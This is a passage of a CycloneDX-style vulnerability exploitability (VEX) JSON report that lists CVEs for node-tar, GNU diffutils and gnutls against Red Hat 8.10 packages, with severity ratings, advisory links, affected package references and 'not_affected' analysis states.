          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-53655",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.1,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:N"
        }
      ],
      "cwes": [
        436
      ],
      "description": "node-tar is a full-featured Tar for Node.js. Prior to 7.5.16, tar (node-tar) applies a PAX extended header's size= record (and other PAX overrides) to the next header entry of any type, including intermediary metadata headers such as a GNU long-name (L) or long-link (K) entry. Per POSIX pax, a PAX extended header (x) describes the next file entry, not the intermediary extension headers that may sit between the x header and the file it annotates. Because node-tar lets the PAX size override the byte length of an intervening L/K/x header, an attacker can desynchronize node-tar's stream cursor relative to every other mainstream tar implementation (GNU tar, libarchive/bsdtar, Python tarfile, and the now-fixed tar-rs / astral-tokio-tar). The result is a tar parser interpretation differential (CWE-436): a single crafted archive yields a different set of members under node-tar than under the reference tar tools. An attacker can use this to hide a member from one parser while it is visible to another, which defeats security tooling whose scanner and extractor disagree on archive contents (e.g. a malware/secret scanner that lists entries with one library while a downstream step extracts with another) This vulnerability is fixed in 7.5.16.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-53655"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-53655"
        },
        {
          "url": "https://github.com/isaacs/node-tar"
        },
        {
          "url": "https://github.com/isaacs/node-tar/security/advisories/GHSA-vmf3-w455-68vh"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-53655"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-53655"
        }
      ],
      "published": "2026-06-22T16:16:38+00:00",
      "updated": "2026-06-26T20:03:47+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2",
          "versions": [
            {
              "version": "2:1.30-11.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-53910",
      "ratings": [
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L"
        }
      ],
      "cwes": [
        190
      ],
      "description": "diff3\u00a0tool from GNU diffutils\u00a0is vulnerable to a heap\u2011based buffer overflow due to multiple signed integer overflows in line\u2011mapping calculations. Incorrect arithmetic in mapping line ranges can result in corrupted values being used for memory allocation and loop bounds.\nWhen processing crafted diff output, these overflows may cause the application to allocate insufficient memory and subsequently perform out\u2011of\u2011bounds writes during internal processing.\u00a0\nAn attacker who can control the output of the diff program used by diff3 (e.g. via --diff-program pointing to a malicious script) can trigger out-of-bounds writes, resulting in a crash and potentially remote code execution depending on the environment.\n\n\nThis issue has been fixed in commit 9ff04d5b84743e331e80b589335a52c5480d1815\u00a0\n\nNOTE:\nThe project maintainers claim that this is not a security issue. They state that the worst outcome this issue can cause is a crash of diff and that it cannot be used to escalate privileges.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-53910"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-53910"
        },
        {
          "url": "https://cert.pl/en/posts/2026/07/CVE-2026-53910"
        },
        {
          "url": "https://cgit.git.savannah.gnu.org/cgit/diffutils.git/commit/?id=73ed7ce85cc78effb94daf028c9af6b4e5252e50"
        },
        {
          "url": "https://cgit.git.savannah.gnu.org/cgit/diffutils.git/commit/?id=9ff04d5b84743e331e80b589335a52c5480d1815"
        },
        {
          "url": "https://git.savannah.gnu.org/cgit/diffutils.git/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-53910"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-53910"
        }
      ],
      "published": "2026-07-22T14:17:21+00:00",
      "updated": "2026-07-27T12:16:45+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/diffutils@3.6-6.el8?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6-6.el8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/diffutils@3.6-6.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/diffutils@3.6-6.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/diffutils@3.6-6.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/diffutils@3.6-6.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/diffutils@3.6-6.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/diffutils@3.6-6.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/diffutils@3.6-6.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/diffutils@3.6-6.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/diffutils@3.6-6.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/diffutils@3.6-6.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/diffutils@3.6-6.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/diffutils@3.6-6.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/diffutils@3.6-6.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/diffutils@3.6-6.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/diffutils@3.6-6.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/diffutils@3.6-6.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/diffutils@3.6-6.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/diffutils@3.6-6.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/diffutils@3.6-6.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/diffutils@3.6-6.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/diffutils@3.6-6.el8?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-5419",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.7,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        208
      ],
      "description": "A flaw was found in gnutls. The PKCS#7 padding check, performed during decryption, was not constant-time. This timing side-channel could allow a remote attacker to potentially leak sensitive information about the padding bytes through observable timing differences. This vulnerability is a form of information disclosure.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-5419"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:13274"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:20612"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:20613"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:26319"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:26409"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:29197"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:30004"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:32962"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-5419"
        },
        {
          "url": "https://bugzilla.redhat.com/2445763"
        },
        {
          "url": "https://bugzilla.redhat.com/2450624"
        },
        {
          "url": "https://bugzilla.redhat.com/2450625"
        },
        {
          "url": "https://bugzilla.redhat.com/2467279"
        },
        {
          "url": "https://bugzilla.redhat.com/2467289"
        },
        {
          "url": "https://bugzilla.redhat.com/2467437"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445762"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445763"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2450624"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2450625"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2467279"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2467289"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2467437"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2467441"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2467448"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2467450"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2467451"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2467678"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2467686"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-33845"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-33846"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-3832"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-3833"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42009"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42010"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42011"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42012"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42013"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42014"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42015"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-5260"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-5419"
        },
        {
          "url": "https://errata.almalinux.org/10/ALSA-2026-20613.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:20612"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-5419.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-50346.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-5419"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8284-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-5419"
        },
        {
          "url": "https://www.gnutls.org/security-new.html#GNUTLS-SA-2026-04-29-13"
        }
      ],
      "published": "2026-06-01T21:16:47+00:00",
      "updated": "2026-07-22T08:10:00+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.16-8.el8_10.6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-54371",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
